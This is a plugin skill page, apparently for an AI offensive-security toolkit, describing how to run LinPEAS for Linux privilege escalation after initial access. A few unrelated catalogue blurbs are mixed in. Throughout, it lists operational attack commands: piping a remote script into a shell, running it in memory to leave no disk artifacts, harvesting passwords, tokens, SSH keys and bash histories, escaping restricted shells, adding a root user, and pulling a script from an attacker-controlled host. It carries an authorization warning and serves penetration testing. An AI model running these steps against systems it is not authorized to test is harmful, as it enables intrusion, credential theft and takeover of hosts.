From threatmodel-skills
Automates LinPEAS for Linux privilege escalation enumeration, detecting SUID/SGID binaries, sudo misconfigs, credentials, container breakouts, and kernel exploits after initial access.
npx claudepluginhub agentsecops/secopsagentkit --plugin offsec-skillsThis skill uses the workspace's default tool permissions.
LinPEAS (Linux Privilege Escalation Awesome Script) is the most comprehensive automated enumeration tool for identifying privilege escalation vectors on Linux systems. It checks 200+ attack vectors, color-codes findings by severity, and maps results to GTFOBins and MITRE ATT&CK.
Designs and optimizes AI agent action spaces, tool definitions, observation formats, error recovery, and context for higher task completion rates.
Compares coding agents like Claude Code and Aider on custom YAML-defined codebase tasks using git worktrees, measuring pass rate, cost, time, and consistency.
Designs, implements, and audits WCAG 2.2 AA accessible UIs for Web (ARIA/HTML5), iOS (SwiftUI traits), and Android (Compose semantics). Audits code for compliance gaps.
LinPEAS (Linux Privilege Escalation Awesome Script) is the most comprehensive automated enumeration tool for identifying privilege escalation vectors on Linux systems. It checks 200+ attack vectors, color-codes findings by severity, and maps results to GTFOBins and MITRE ATT&CK.
IMPORTANT: Use only on systems where you have explicit written authorization. Unauthorized use constitutes computer fraud. All actions should be conducted within defined engagement scope.
# Download and run LinPEAS directly (no-install, in-memory)
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Save output for analysis
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh -o /tmp/linpeas.sh
chmod +x /tmp/linpeas.sh
/tmp/linpeas.sh -a 2>&1 | tee /tmp/linpeas_output.txt
# Stealth / faster scan (skips time-consuming checks)
/tmp/linpeas.sh -s 2>&1 | tee /tmp/linpeas_fast.txt
Script variants (choose based on environment):
linpeas.sh — default, includes linux exploit suggesterlinpeas_fat.sh — embeds third-party tools (no internet needed on target)linpeas_small.sh — essential checks only, smallest footprintUse scripts/linpeas_runner.py for structured JSON output and automated triage.
Progress:
[ ] 1. Verify authorization and document scope
[ ] 2. Transfer or fetch LinPEAS to target (curl, wget, or scp)
[ ] 3. Execute scan: ./linpeas.sh -a 2>&1 | tee linpeas_output.txt
[ ] 4. Triage findings by severity (RED = critical, YELLOW = medium)
[ ] 5. Validate top vectors manually before exploitation
[ ] 6. Attempt privilege escalation using highest-confidence vector
[ ] 7. Verify privilege level: id && whoami
[ ] 8. Document exploitation path and clean up artifacts
| Color | Meaning |
|---|---|
| RED+ | 95% escalation probability (exploit immediately) |
| RED | High confidence vector (validate then exploit) |
| YELLOW | Interesting finding (requires manual review) |
| GREEN | Low-risk information |
# SUID/SGID binaries only
find / -perm -4000 -o -perm -2000 2>/dev/null | xargs ls -la
# Sudo permissions
sudo -l
# Running processes and services
ps aux && systemctl list-units --type=service --state=running
# Capabilities
/usr/sbin/getcap -r / 2>/dev/null
# Writable paths in PATH
echo $PATH | tr ':' '\n' | xargs -I{} find {} -writable -type f 2>/dev/null
# Cron jobs
cat /etc/crontab; ls -la /etc/cron.*; crontab -l 2>/dev/null
# Network connections and open ports
ss -tulpn; netstat -tulpn 2>/dev/null
See references/privesc_vectors.md for detailed exploitation steps per vector.
Sudo Misconfigurations
sudo -l
# Look for: NOPASSWD entries, unrestricted shells, wildcard abuse
# GTFOBins: https://gtfobins.github.io/
SUID Binaries
find / -perm -u=s -type f 2>/dev/null
# Cross-reference with GTFOBins for exploitation techniques
Writable /etc/passwd or /etc/shadow
ls -la /etc/passwd /etc/shadow
# If writable: add root user with known hash
Kernel Exploits
uname -r && cat /etc/os-release
# Use linpeas output: check CVE suggestions for kernel version
# Bash history
cat ~/.bash_history; find / -name ".bash_history" 2>/dev/null | xargs cat
# Config files with passwords
grep -r "password\|passwd\|secret\|token" /etc /opt /var/www 2>/dev/null --include="*.conf" --include="*.cfg" --include="*.ini"
# SSH keys
find / -name "id_rsa" -o -name "id_ecdsa" 2>/dev/null
# Detect container environment
cat /proc/1/cgroup | grep -i docker
ls /.dockerenv 2>/dev/null
env | grep -i kube
# Check for privileged container
cat /proc/self/status | grep CapEff
# Full capabilities (0000003fffffffff) = privileged container
See references/mitre_mapping.md for MITRE ATT&CK technique mappings.
/dev/shm) to avoid disk artifacts.scripts/)linpeas_runner.py — Automates LinPEAS fetch, execution, output parsing, and JSON report generation with severity triagereferences/)privesc_vectors.md — Detailed exploitation steps for common Linux privesc vectors (SUID, sudo, crons, capabilities, NFS, LD_PRELOAD, PATH hijacking)mitre_mapping.md — MITRE ATT&CK technique mappings for each enumerated vectorassets/)linpeas_report_template.md — Engagement report template for documenting privilege escalation findingsshell command or post/multi/manage/shell_to_meterpreterrecon-nmap identifies live Linux targetslinpeas_runner.py JSON output into CVSS scoring and risk documentationSolution: Use the Python/PSPY alternative or compile a custom version.
# Run from memory (no disk write)
curl -sL <url> | bash
# Or use pspy for process monitoring only
./pspy64
Solution: Escape restricted shell before running enumeration.
# Try common bypasses
python3 -c 'import pty; pty.spawn("/bin/bash")'
vi -c ':!/bin/bash'
awk 'BEGIN {system("/bin/bash")}'
Solution: Transfer LinPEAS via the attacker machine.
# On attacker (Python HTTP server)
python3 -m http.server 8080
# On target
wget http://<attacker-ip>:8080/linpeas.sh -O /tmp/lp.sh && chmod +x /tmp/lp.sh && /tmp/lp.sh